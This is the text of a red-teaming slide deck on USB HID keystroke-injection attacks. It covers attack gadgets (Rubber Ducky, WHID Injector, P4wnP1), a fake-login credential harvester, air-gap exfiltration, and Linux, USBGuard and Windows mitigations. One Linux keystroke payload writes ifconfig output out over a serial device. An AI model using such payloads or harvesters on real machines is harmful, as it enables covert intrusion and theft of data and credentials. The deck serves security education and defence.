Red teaming
HID Attacks
Human Interface Device
“A human interface device or HID is a type of computer device usually
used by humans and takes input and gives output to humans.” –
Wikipedia
• Keyboard, Mouse, Game Controllers, Drawing tablets, etc.
• Most of the time they don't need external drivers to operate
• Usually whitelisted by DLP tools
• Not under Antiviruses’ scope
1st Gen.
• Teensy – (PHUKD 2009 & Kautilya 2011)
– DIY Solution
– Multiplatform (Win, *nix, OSX)
– Multipayload (through DIP-Switches)
– Cheaper (25 €)
• Rubberducky (2010)
– Dedicated Hardware
– Multiplatform (Win, *nix, OSX)
– Can emulate Keyboard & USB Disk
– Multipayload (CAPS-INS-NUM)
– Changeable VID/PID – Expensive (55 €)
2nd Gen.
• BadUSB (2014)
– Exploits the controllers (e.g. Phison) inside commercial USB devices and
turns them into covert keystroke-injecting devices.
• TURNIPSCHOOL (2015)
– Is a hardware implant concealed in a USB cable. It provides short range RF
communication capability to software running on the host computer.
Alternatively it could serve as a custom USB device under radio control.
3rd Gen.
• WHID Injector (2017)
– A Rubberducky on Steroids
– Dedicated Hardware
– Multiplatform (Win, *nix, OSX)
– Changeable VID/PID
– Has WiFi
– Cheap (11 €)
• P4wnP1 (2017)
– A BashBunny on Steroids
– Based on RPi Zero W (~15 €)
– Has WiFi and USB to ETH
– It can emulate USB Key FileSystem
– Autocall Back to C2
– Changeable VID/PID
– And many other cool features!
WHID Injector
• Atmega 32u4
– Arduino-friendly
• ESP-12
– WiFi (both AP and Client modes)
– TCP/IP Stack – DNS Support
– 4MB Flash
• Pinout for weaponizing USB gadgets
• HALL Sensor for easy unbrick
Weaponizing USB Gadgets
WHID Injector – WHID GUI (web interface)
• Shipped w/ Cactus WHID
• Hidden SSID
• ESPortal Credentials Harvester
• Multi OS (Win, OSX, *nix)
• AutoStart Function
• Change settings on-the-fly
• Live Payloads
• Duckyscript to WHID Converter
• OTA Update of ESP firmware
• Changeable VID/PID
• Reset ESP from Serial
• AirGap Bypass through Serial
WHID Injector – WHID GUI (Android app)
• Multi OS
• AutoStart Function & Live Payloads
• Change settings on-the-fly (Hidden SSID, Update FW, Changeable VID/PID)
Spoofing VID & PID
Edit boards.txt in Arduino configuration directory
• Linux:
/root/.arduino15/packages/arduino/hardware/avr/1.6.19/
• Windows: C:\Program Files (x86)\Arduino\hardware\arduino\avr
AirGap Bypass - Windows Serial Exfiltration (Driverless)
AirGap Bypass - Linux Serial Exfiltration
CustomDelay:3000
DefaultDelay:50
Press:134+195
CustomDelay:1000
PrintLine:gnome-terminal
CustomDelay:1000
PrintLine:sleep .5;stty -F /dev/serial/by-id/*LilyPad* 38400;echo -e "SerialEXFIL:"$(ifconfig)"\n" > /dev/serial/by-id/*LilyPad*;exit
ESPortal Credentials Harvester
• Redirects HTTP requests to a fake login page.
– Does not support HTTPS requests nor override cached HTTPS redirects.
• You can define a custom template for up to 3 specific domains, a welcome portal,
and a catch-all.
• Captured credentials are stored on the exfiltration page in the file "esportal-
log.txt".
• Custom html templates can be uploaded for the ESPortal login credential harvester
via FTP.
Software Frameworks – USaBuse
• Bypass Air-Gapped restrictions
• Once connected to a PC:
– Creates a WiFi AP
– Stealthy Screensaver Killer
– Injects PoSH scripts that create a raw HID channel to exfiltrate data back.
– Returns a CMD shell to the attacker
P4wnP1
• Bypass Air-Gapped restrictions
– Uses a HID RAW as exfil channel to transfer data back (~50Kb/s)
– The HID backdoor can call back a remote C&C (in case of a weaponized gadget
& a known WiFi network available)
• Supports RubberDucky Scripts
– Can also be triggered by CAPS-, NUM- or SCROLL-LOCK interaction on target
• Win10 Lockpicker
– Steals NetNTLMv2 hash from locked Windows machine, attempts to crack the
hash and enters the plain password to unlock the machine on success. (Fixed
with KB4041691 on October 10, 2017).
POTÆbox
Penetration Over The {Air, Ethernet} box
• Quad-core CPU ARM
• 2 GB RAM
• 8 GB NAND
• 2x Gigabit Ethernet Ports (for MiTM, NAC Bypass,
etc.)
• 2x USB 2.0 Ports
• Embedded Microphone
• Embedded Camera (at least, connector for it)
• 2G/3G Module (w/ SIM card slot)
• uSD card slot
• Atheros WiFi Chipset (2x, space permitting)
• Relays controlled by GPIOs (to remotely control
lights, TV, etc.)
• HDMI in & out (for HDMI MiTM) – WIP
POTAEbox Purposes:
- Security Operations (i.e. Penetration Tests)
- Surveillance (i.e. Mic & Camera)
- Network Appliance (i.e. Firewall, IDS, Honeypot)
- Home Automation (i.e. Lights)
- Generic Electronic Projects
Redteaming HID attacks
P4wnP1 Mods
P4wnP1 OLED Bonnet mod
P4wnP1 ophcrack payload
PoisonTap by Samy Kamkar
More Mods
Pentest Dropboxes
Mitigations – Linux
Use udev rules to temporarily disable the addition of new HID
devices by creating a file:
/etc/udev/rules.d/10-usbblock.rules
with the content:
#ACTION=="add", ATTR{bInterfaceClass}=="03", RUN+="/bin/sh -c 'echo 0 >/sys$DEVPATH/../authorized'"
Run to Block:
sed -i 's/#//' /etc/udev/rules.d/10-usbblock.rules; udevadm control --reload-rules
Run to Unlock Before Reboot:
sed -i 's/^/#/' /etc/udev/rules.d/10-usbblock.rules; udevadm control --reload-rules
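The block/unblock procedure above, packaged as shell functions. This is an added example and not part of the deck; it assumes nothing beyond POSIX sh, sed and udevadm. The rules file path is an optional argument (defaulting to the slide's /etc/udev/rules.d/10-usbblock.rules) so the functions can be exercised on a scratch file without root, and the sed patterns are anchored to the rule line so that repeated enable/disable calls neither strip other characters nor stack comment markers, which the slide's unanchored `s/#//` and `s/^/#/` would.

```shell
#!/bin/sh
# Added example, not from the slides: the deck's udev-based HID block as shell
# functions. The rules file path is an optional argument so the functions can be
# exercised on a scratch file; it defaults to the path used on the slide.
USBBLOCK_RULES_DEFAULT=/etc/udev/rules.d/10-usbblock.rules

# The rule, inactive (commented out) as on the slide. Once active, every newly
# added USB interface of class 03 (HID) gets its parent device deauthorized, so
# a gadget that enumerates as a keyboard is switched off before it can type.
usbblock_rule_text() {
    cat <<'EOF'
#ACTION=="add", ATTR{bInterfaceClass}=="03", RUN+="/bin/sh -c 'echo 0 >/sys$DEVPATH/../authorized'"
EOF
}

# Create the rules file (inactive) if it is not there yet.
usbblock_install() {
    f=${1:-$USBBLOCK_RULES_DEFAULT}
    [ -e "$f" ] || usbblock_rule_text > "$f"
}

# Rewrite file $1 in place with sed expression $2, keeping the file's mode and
# ownership (a plain mv of a temp file would replace them with the temp file's).
_usbblock_edit() {
    tmp=$(mktemp) || return 1
    sed "$2" "$1" > "$tmp" && cat "$tmp" > "$1"
    rc=$?
    rm -f "$tmp"
    return $rc
}

# Activate: drop the comment marker in front of the rule. Anchored, so calling
# it twice is harmless and no other '#' in the file is touched.
usbblock_enable() {
    _usbblock_edit "${1:-$USBBLOCK_RULES_DEFAULT}" 's/^#\(ACTION==\)/\1/'
}

# Deactivate: put the marker back. Run this before rebooting, because an active
# rule would also deauthorize the real keyboard enumerated at boot.
usbblock_disable() {
    _usbblock_edit "${1:-$USBBLOCK_RULES_DEFAULT}" 's/^\(ACTION==\)/#\1/'
}

# Report "active" or "inactive" from the file content.
usbblock_status() {
    if grep -q '^ACTION==' "${1:-$USBBLOCK_RULES_DEFAULT}"; then
        echo active
    else
        echo inactive
    fi
}

# Make udev pick up the change (needs root). Reported rather than silently
# skipped where udevadm is missing, e.g. inside a container.
usbblock_reload() {
    if command -v udevadm >/dev/null 2>&1; then
        udevadm control --reload-rules
    else
        echo "udevadm not found; rules not reloaded" >&2
        return 1
    fi
}
```

As root, `usbblock_install && usbblock_enable && usbblock_reload` arms the block and `usbblock_disable && usbblock_reload` disarms it. Because the rule fires on `ACTION=="add"`, HIDs already enumerated when it is activated keep working; only devices plugged in afterwards are deauthorized, which is why it must be disabled again before a reboot.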
Mitigations – Linux Tools
• https://github.com/trpt/usbdeath
– Anti-forensic tool that writes udev rules for known USB devices and performs
configured actions when an unknown USB device is inserted or a specific device is removed
• https://github.com/USBGuard/usbguard
– Software framework for implementing USB device authorization policies
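As an added illustration of the kind of authorization policy USBGuard expresses (constructed here, not taken from the slides or the USBGuard project; the device ids and serial are placeholders), a rules file that allows the root hubs, refuses any device presenting both a mass-storage and a HID interface, and blocks every other newly seen HID interface until an administrator allows it by id and serial:

```conf
# Constructed example usbguard rules (not from the slides or the USBGuard project).
# First matching rule wins; a device matching no rule falls through to the daemon's
# implicit policy, which should be set to "block" for a default-deny posture.

# Root hubs (replace with the ids reported by `usbguard list-devices`).
allow id 1d6b:0002
allow id 1d6b:0003

# Reject a device that is a mass-storage disk and a HID at the same time:
# the "Can emulate Keyboard & USB Disk" combination described in this deck.
reject with-interface all-of { 08:*:* 03:*:* }

# Explicitly allowed keyboard. VID/PID alone are spoofable (see "Spoofing VID & PID"
# above), so pin the serial number as well. Placeholder values:
allow id VVVV:PPPP serial "SERIAL-PLACEHOLDER"

# Block any other newly seen HID (class 03) interface until it is allowed.
block with-interface one-of { 03:*:* }
```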
Mitigations – Windows Tools
• https://github.com/pmsosa/duckhunt
– Four Operational Modes:
• Paranoid: KB input is disallowed until a password is input. Attack will also
be logged.
• Normal: KB input will temporarily be disallowed. Attack will also be logged.
• Sneaky: A few keys will be dropped. Attack will also be logged.
• LogOnly: Simply log the attack.
• https://github.com/JLospinoso/beamgun
– When a malicious HID is inserted it blocks keystrokes injection
by continuously stealing focus (and eventually locking the
workstation)
Resources
• http://whid.ninja
• https://medium.com/@LucaBongiorni/
• https://github.com/exploitagency/ESPloitV2
• https://github.com/sensepost/USaBUSe
• https://github.com/mame82/P4wnP1
• http://p4wnp1.readthedocs.io/en/latest/
• https://github.com/mossmann/cc11xx/tree/master/turnipschool
• https://srlabs.de/bites/usb-peripherals-turn/
• https://hakshop.com/products/usb-rubber-ducky-deluxe
• https://nsa.gov1.info/dni/nsa-ant-catalog/usb/index.html
Fin
